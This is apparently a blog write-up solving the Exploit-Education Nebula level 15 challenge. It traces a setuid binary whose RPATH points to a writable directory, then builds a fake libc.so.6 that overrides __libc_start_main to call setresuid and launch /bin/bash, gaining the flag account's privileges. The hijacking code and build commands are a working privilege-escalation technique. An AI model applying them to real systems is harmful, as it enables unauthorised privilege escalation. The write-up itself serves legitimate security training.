---
layout: single_c
title:  "Exploit-Education Nebula Level 15"
date:   2019-08-22 10:43:16 +0530
categories: Exploit-Education
tags: Nebula
classes: wide
--- 
### [Exploit Education Level 14](https://exploit.education/nebula/level-15/)

## Challenge
level15@nebula:/home/flag15$ ls
flag15
level15@nebula:/home/flag15$ clear
level15@nebula:/home/flag15$ strace ./flag15
execve("./flag15", ["./flag15"], [/* 16 vars */]) = 0
brk(0)                                  = 0x8ca5000
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7749000
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
open("/var/tmp/flag15/tls/i686/sse2/cmov/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
stat64("/var/tmp/flag15/tls/i686/sse2/cmov", 0xbfc2d3c4) = -1 ENOENT (No such file or directory)
open("/var/tmp/flag15/tls/i686/sse2/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
stat64("/var/tmp/flag15/tls/i686/sse2", 0xbfc2d3c4) = -1 ENOENT (No such file or directory)
open("/var/tmp/flag15/tls/i686/cmov/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
stat64("/var/tmp/flag15/tls/i686/cmov", 0xbfc2d3c4) = -1 ENOENT (No such file or directory)
open("/var/tmp/flag15/tls/i686/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
stat64("/var/tmp/flag15/tls/i686", 0xbfc2d3c4) = -1 ENOENT (No such file or directory)
open("/var/tmp/flag15/tls/sse2/cmov/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
stat64("/var/tmp/flag15/tls/sse2/cmov", 0xbfc2d3c4) = -1 ENOENT (No such file or directory)
open("/var/tmp/flag15/tls/sse2/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
stat64("/var/tmp/flag15/tls/sse2", 0xbfc2d3c4) = -1 ENOENT (No such file or directory)
open("/var/tmp/flag15/tls/cmov/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
stat64("/var/tmp/flag15/tls/cmov", 0xbfc2d3c4) = -1 ENOENT (No such file or directory)
open("/var/tmp/flag15/tls/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
stat64("/var/tmp/flag15/tls", 0xbfc2d3c4) = -1 ENOENT (No such file or directory)
open("/var/tmp/flag15/i686/sse2/cmov/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
stat64("/var/tmp/flag15/i686/sse2/cmov", 0xbfc2d3c4) = -1 ENOENT (No such file or directory)
open("/var/tmp/flag15/i686/sse2/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
stat64("/var/tmp/flag15/i686/sse2", 0xbfc2d3c4) = -1 ENOENT (No such file or directory)
open("/var/tmp/flag15/i686/cmov/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
stat64("/var/tmp/flag15/i686/cmov", 0xbfc2d3c4) = -1 ENOENT (No such file or directory)
open("/var/tmp/flag15/i686/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
stat64("/var/tmp/flag15/i686", 0xbfc2d3c4) = -1 ENOENT (No such file or directory)
open("/var/tmp/flag15/sse2/cmov/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
stat64("/var/tmp/flag15/sse2/cmov", 0xbfc2d3c4) = -1 ENOENT (No such file or directory)
open("/var/tmp/flag15/sse2/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
stat64("/var/tmp/flag15/sse2", 0xbfc2d3c4) = -1 ENOENT (No such file or directory)
open("/var/tmp/flag15/cmov/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
stat64("/var/tmp/flag15/cmov", 0xbfc2d3c4) = -1 ENOENT (No such file or directory)
open("/var/tmp/flag15/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
stat64("/var/tmp/flag15", {st_mode=S_IFDIR|0775, st_size=3, ...}) = 0
open("/etc/ld.so.cache", O_RDONLY)      = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=33815, ...}) = 0
mmap2(NULL, 33815, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7740000
close(3)                                = 0
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/lib/i386-linux-gnu/libc.so.6", O_RDONLY) = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\222\1\0004\0\0\0"..., 512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1544392, ...}) = 0
mmap2(NULL, 1554968, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x9f8000
mmap2(0xb6e000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x176) = 0xb6e000
mmap2(0xb71000, 10776, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb71000
close(3)                                = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb773f000
set_thread_area({entry_number:-1 -> 6, base_addr:0xb773f8d0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
mprotect(0xb6e000, 8192, PROT_READ)     = 0
mprotect(0x8049000, 4096, PROT_READ)    = 0
mprotect(0x335000, 4096, PROT_READ)     = 0
munmap(0xb7740000, 33815)               = 0
fstat64(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7748000
write(1, "strace it!\n", 11strace it!
)            = 11
exit_group(11)                          = ?
level15@nebula:/home/flag15$




level15@nebula:/var/tmp/flag15/tls/i686/sse2/cmov$ ltrace /home/flag15/flag15
__libc_start_main(0x8048330, 1, 0xbfb8f614, 0x8048400, 0x8048470 <unfinished ...>
puts("strace it!"strace it!
)                                                   = 11
+++ exited (status 11) +++
level15@nebula:/var/tmp/flag15/tls/i686/sse2/cmov$



level15@nebula:/home/flag15$ objdump -R flag15

flag15:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE
08049ff0 R_386_GLOB_DAT    __gmon_start__
0804a000 R_386_JUMP_SLOT   puts
0804a004 R_386_JUMP_SLOT   __gmon_start__
0804a008 R_386_JUMP_SLOT   __libc_start_main

level15@nebula:/home/flag15$ objdump -p flag15
Dynamic Section:
  NEEDED               libc.so.6
  RPATH                /var/tmp/flag15
  INIT                 0x080482c0
  FINI                 0x080484ac
  GNU_HASH             0x080481ac
  STRTAB               0x0804821c
  SYMTAB               0x080481cc
  STRSZ                0x0000005a
  SYMENT               0x00000010
  DEBUG                0x00000000
  PLTGOT               0x08049ff4
  PLTRELSZ             0x00000018
  PLTREL               0x00000011
  JMPREL               0x080482a8
  REL                  0x080482a0
  RELSZ                0x00000008
  RELENT               0x00000008
  VERNEED              0x08048280
  VERNEEDNUM           0x00000001
  VERSYM               0x08048276

Version References:
  required from libc.so.6:
    0x0d696910 0x00 02 GLIBC_2.0

-rpath=dir
           Add a directory to the runtime library search path.  This is used when linking an ELF executable
           with shared objects.  All -rpath arguments are concatenated and passed to the runtime linker,
           which uses them to locate shared objects at runtime.  The -rpath option is also used when locating
           shared objects which are needed by shared objects explicitly included in the link;

open("/var/tmp/flag15/tls/i686/sse2/cmov/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)

[Libc](https://refspecs.linuxbase.org/LSB_3.0.0/LSB-PDA/LSB-PDA/baselib---libc-start-main-.html)
int __libc_start_main(int *(main) (int, char * *, char * *), int argc, char * * ubp_av, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void (* stack_end));



level15@nebula:/var/tmp/flag15/tls/i686/sse2/cmov$ cat libc.c
#include <stdlib.h>
int __libc_start_main(int *(main) (int, char * *, char * *), int argc, char * * ubp_av, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void (* stack_end))
{
system("/bin/bash");
return 0;
}


level15@nebula:/var/tmp/flag15/tls/i686/sse2/cmov$ gcc -shared -fPIC -o libc.so.6 libc.c -lc

level15@nebula:/var/tmp/flag15/tls/i686/sse2/cmov$ ltrace /home/flag15/flag15
/home/flag15/flag15: /var/tmp/flag15/tls/i686/sse2/cmov/libc.so.6: no version information available (required by /home/flag15/flag15)
/home/flag15/flag15: /var/tmp/flag15/tls/i686/sse2/cmov/libc.so.6: no version information available (required by /var/tmp/flag15/tls/i686/sse2/cmov/libc.so.6)
/home/flag15/flag15: /var/tmp/flag15/tls/i686/sse2/cmov/libc.so.6: no version information available (required by /var/tmp/flag15/tls/i686/sse2/cmov/libc.so.6)
/home/flag15/flag15: relocation error: /var/tmp/flag15/tls/i686/sse2/cmov/libc.so.6: symbol __cxa_finalize, version GLIBC_2.1.3 not defined in file libc.so.6 with link time reference
+++ exited (status 127) +++

script=<version-script>


level15@nebula:/var/tmp/flag15/tls/i686/sse2/cmov$ ltrace /home/flag15/flag15
/home/flag15/flag15: /var/tmp/flag15/tls/i686/sse2/cmov/libc.so.6: version `GLIBC_2.0' not found (required by /home/flag15/flag15)
/home/flag15/flag15: /var/tmp/flag15/tls/i686/sse2/cmov/libc.so.6: version `GLIBC_2.0' not found (required by /var/tmp/flag15/tls/i686/sse2/cmov/libc.so.6)
+++ exited (status 1) +++

level15@nebula:/var/tmp/flag15/tls/i686/sse2/cmov$ gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic -o libc.so.6 libc.c

level15@nebula:/var/tmp/flag15/tls/i686/sse2/cmov$ ltrace /home/flag15/flag15                                   
__libc_start_main(0x8048330, 1, 0xbf9b75f4, 0x8048400, 0x8048470level15
@nebula:/var/tmp/flag15/tls/i686/sse2/cmov$ id
uid=1016(level15) gid=1016(level15) groups=1016(level15)
level15@nebula:/var/tmp/flag15/tls/i686/sse2/cmov$ 


level15@nebula:/var/tmp/flag15/tls/i686/sse2/cmov$ cat libc.c
#include <stdlib.h>

void __cxa_finalize();

int __libc_start_main(int *(main) (int, char * *, char * *), int argc, char * * ubp_av, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void (* stack_end))
{
setresuid(geteuid(),geteuid(),geteuid());
system("/bin/bash");
return 0;
}
level15@nebula:/var/tmp/flag15/tls/i686/sse2/cmov$ gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic -o libc.so.6 libc.c
level15@nebula:/var/tmp/flag15/tls/i686/sse2/cmov$ /home/flag15/flag15
flag15@nebula:/var/tmp/flag15/tls/i686/sse2/cmov$ id
uid=984(flag15) gid=1016(level15) groups=984(flag15),1016(level15)
flag15@nebula:/var/tmp/flag15/tls/i686/sse2/cmov$ getflag
You have successfully executed getflag on a target account
